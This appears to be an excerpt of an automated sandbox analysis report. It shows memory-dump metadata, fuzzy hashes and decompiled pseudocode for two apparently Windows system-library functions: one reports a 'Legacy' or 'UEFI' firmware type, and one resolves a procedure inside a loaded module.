0x02a1e618

Strings

`, xrefs: 02A1E670
`, xrefs: 02A1E5D7

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 355b9e655307e9ce02ee607ee3199aee924a6ccc11b1a93108def69aad7cd64e
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 759170716043419FE724CF25CA45B2BB7E6BF84728F14892DFAA5CB281EB74E904CB51

Uniqueness

Uniqueness Score: -1.00%

Function 029D51BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E029D51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x2a305f0);
				E029AD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0296EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E029D53CA(0);
						return E029AD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0299F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E02973690(1, _t117, 0x2931810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0299AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L02974620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0299AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E029D500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E02999860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x029d51be
0x029d51c3
0x029d51c8
0x029d51cd
0x029d51d0
0x029d51d3
0x029d51d8
0x029d51db
0x029d51de
0x029d51e0
0x029d51e3
0x029d51e6
0x029d51e8
0x029d5342
0x029d5351
0x029d5356
0x029d535a
0x029d5360
0x029d5363
0x029d5366
0x029d5369
0x029d5369
0x029d536b
0x029d536b
0x029d5370
0x029d53a3
0x029d53a4
0x029d53a6
0x029d53ab
0x029d53ab
0x029d53ae
0x029d53ae
0x029d53b5
0x029d53bf
0x029d53bf
0x029d5375
0x029d5396
0x029d53a0
0x029d53a0
0x00000000
0x029d5396
0x029d5377
0x029d5379
0x029d537f
0x029d538c
0x029d5390
0x00000000
0x029d5390
0x029d51ee
0x029d51f1
0x029d5301
0x029d5310
0x029d5315
0x029d5318
0x029d531b
0x029d5320
0x029d532e
0x029d5331
0x00000000
0x029d5331
0x029d5328
0x029d5329
0x00000000
0x029d5329
0x029d51fa
0x029d5235
0x029d5236
0x029d5239
0x029d523f
0x029d5240
0x029d5241
0x029d5242
0x029d5246
0x029d5247
0x029d524e
0x029d5251
0x029d5267
0x029d5269
0x029d526e
0x029d527d
0x029d527e
0x029d5281
0x029d5282
0x029d5287
0x029d5288
0x029d528a
0x029d528f
0x029d5294
0x00000000
0x00000000
0x029d529a
0x029d529c
0x029d529e
0x029d529e
0x029d52a4
0x029d52b0
0x00000000
0x00000000
0x029d52ba
0x029d52bc
0x029d52bc
0x029d52d4
0x029d52d9
0x029d52dc
0x029d52e1
0x00000000
0x00000000
0x029d52e7
0x029d52f4
0x00000000
0x029d52f4
0x029d5270
0x00000000
0x029d5270
0x029d51fc
0x029d51fd
0x029d5202
0x029d5203
0x029d5205
0x029d520a
0x029d520f
0x00000000
0x00000000
0x029d521b
0x029d5226
0x029d522b
0x029d521d
0x029d521d
0x029d5222
0x029d5222
0x029d522d
0x00000000

Strings

Legacy, xrefs: 029D5226
UEFI, xrefs: 029D521D

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 2a29b6c8d51f71e282a3c2d58b7744c714d3c3b018bec3c0867aae72754fdb56
Instruction ID: 14e3f20df18852f0fcfffad9ad0e436dde2e6ef4504f9e690bdf34137bd78d7a
Opcode Fuzzy Hash: 2a29b6c8d51f71e282a3c2d58b7744c714d3c3b018bec3c0867aae72754fdb56
Instruction Fuzzy Hash: D9517A71A00609DFDB24DFA88880BAEBBF9FB88744F55842DE609EB251D7719900DB10

Uniqueness

Uniqueness Score: -1.00%

Function 0296D5E0, Relevance: 1.9, APIs: 1, Instructions: 353
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E0296D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x2a4d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E02966600(0x2a452d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x2a47b9c; // 0x0
							_t281 = L02974620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0299F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x2a47b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x2a47b8c; // 0xaa2ae8
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E02972280(_t200, 0x2a484d8);
									_t277 =  *0x2a485f4; // 0xaae4f0
									_t351 =  *0x2a485f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xaae488
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0296FFB0(_t287, _t353, 0x2a484d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E029ACC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E02966600(0x2a452d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E02967926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x2a4b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E029DE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x2a48472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x2a4b218; // 0x6ab0bb6c
														asm("ror edi, cl");
														 *0x2a4b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E02972280(_t250, 0x2a484d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L02993898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0296FFB0(_t293, _t353, 0x2a484d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E029937F5(_t353, 0);
																}
																E02990413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E02989B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E029802D6(_t174);
																}
																L029777F0( *0x2a47b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0298C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0296EC7F(_t353);
										L029819B8(_t287, 0, _t353, 0);
										_t200 = E0295F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0299B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x2a4b2f8; // 0x0
									if((_t206 |  *0x2a4b2fc) == 0 || ( *0x2a4b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x2a4b2ec; // 0x0
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E02A06B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E02A06AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E0296E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L0296EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E02999730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E0296E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L02968F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E02993C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x0296d5f2
0x0296d5f5
0x0296d5f5
0x0296d5fd
0x0296d600
0x0296d60a
0x0296d60d
0x0296d617
0x0296d61d
0x0296d627
0x0296d62e
0x0296d911
0x0296d913
0x00000000
0x0296d919
0x0296d919
0x0296d919
0x0296d634
0x0296d634
0x0296d634
0x0296d634
0x0296d640
0x0296d8bf
0x00000000
0x0296d646
0x0296d646
0x0296d64d
0x0296d652
0x029bb2fc
0x029bb2fc
0x029bb302
0x029bb33b
0x029bb341
0x00000000
0x029bb304
0x029bb304
0x029bb319
0x029bb31e
0x029bb324
0x029bb326
0x029bb332
0x029bb347
0x029bb34c
0x029bb351
0x029bb35a
0x00000000
0x029bb328
0x029bb328
0x00000000
0x029bb328
0x029bb326
0x0296d658
0x0296d658
0x0296d65b
0x0296d665
0x00000000
0x0296d66b
0x0296d66b
0x0296d66b
0x0296d66b
0x0296d66d
0x0296d672
0x0296d67a
0x00000000
0x00000000
0x0296d680
0x0296d686
0x0296d8ce
0x0296d8d4
0x0296d8dd
0x0296d8e0
0x0296d68c
0x0296d691
0x0296d69d
0x0296d6a2
0x0296d6a7
0x0296d6b0
0x0296d6b5
0x0296d6e0
0x0296d6b7
0x0296d6b7
0x0296d6b9
0x0296d6b9
0x0296d6bb
0x0296d6bd
0x0296d6ce
0x0296d6d0
0x0296d6d2
0x029bb363
0x029bb365
0x00000000
0x029bb36b
0x00000000
0x029bb36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0296d6bf
0x0296d6bf
0x0296d6e5
0x0296d6e7
0x0296d6e9
0x0296d6ec
0x0296d6ec
0x0296d6ef
0x0296d6f5
0x0296d6f9
0x0296d6fb
0x0296d6fd
0x0296d701
0x0296d703
0x0296d70a
0x0296d70a
0x0296d701
0x0296d710
0x0296d710
0x0296d6c1
0x0296d6c1
0x0296d6c6
0x029bb36d
0x029bb36f
0x00000000
0x029bb375
0x029bb375
0x029bb375
0x00000000
0x029bb375
0x00000000
0x0296d6cc
0x0296d6d8
0x0296d6d8
0x0296d6d8
0x00000000
0x0296d6c6
0x0296d6bf
0x00000000
0x0296d6da
0x0296d6da
0x0296d716
0x0296d71b
0x0296d720
0x0296d726
0x0296d726
0x0296d72d
0x00000000
0x0296d733
0x0296d739
0x0296d742
0x0296d750
0x0296d758
0x0296d764
0x0296d776
0x0296d77a
0x0296d783
0x0296d928
0x0296d92c
0x0296d93d
0x0296d944
0x0296d94f
0x0296d954
0x0296d956
0x0296d95f
0x0296d961
0x0296d973
0x0296d973
0x0296d956
0x0296d944
0x0296d92c
0x0296d78b
0x029bb394
0x0296d791
0x0296d798
0x029bb3a3
0x029bb3bb
0x029bb3bb
0x0296d7a5
0x0296d866
0x0296d870
0x0296d884
0x0296d892
0x0296d898
0x0296d89e
0x0296d8a0
0x0296d8a6
0x0296d8ac
0x0296d8ae
0x0296d8b4
0x0296d8b4
0x0296d8ae
0x0296d7a5
0x0296d78b
0x0296d7b1
0x029bb3c5
0x029bb3c5
0x0296d7c3
0x0296d7ca
0x0296d7e5
0x0296d7eb
0x0296d8eb
0x0296d8ed
0x00000000
0x0296d8f3
0x0296d8f3
0x0296d8f3
0x00000000
0x0296d8ed
0x0296d7cc
0x0296d7cc
0x0296d7d2
0x00000000
0x0296d7d4
0x0296d7d4
0x0296d7d7
0x0296d7df
0x029bb3d4
0x029bb3d9
0x029bb3dc
0x029bb3dc
0x029bb3df
0x029bb3e2
0x029bb468
0x029bb46d
0x029bb46f
0x029bb46f
0x029bb475
0x0296d8f8
0x0296d8f9
0x0296d8fd
0x029bb3e8
0x029bb3e8
0x029bb3eb
0x029bb3ed
0x00000000
0x029bb3ef
0x029bb3ef
0x029bb3f1
0x029bb3f4
0x029bb3fe
0x029bb404
0x029bb409
0x029bb40e
0x029bb410
0x029bb410
0x029bb414
0x029bb414
0x029bb41b
0x029bb420
0x029bb423
0x029bb425
0x029bb427
0x029bb42a
0x029bb42d
0x029bb42d
0x029bb42a
0x029bb432
0x029bb436
0x029bb438
0x029bb43b
0x029bb43b
0x029bb449
0x029bb44e
0x029bb454
0x029bb458
0x029bb458
0x029bb45d
0x00000000
0x029bb45d
0x029bb3ed
0x00000000
0x00000000
0x00000000
0x0296d7df
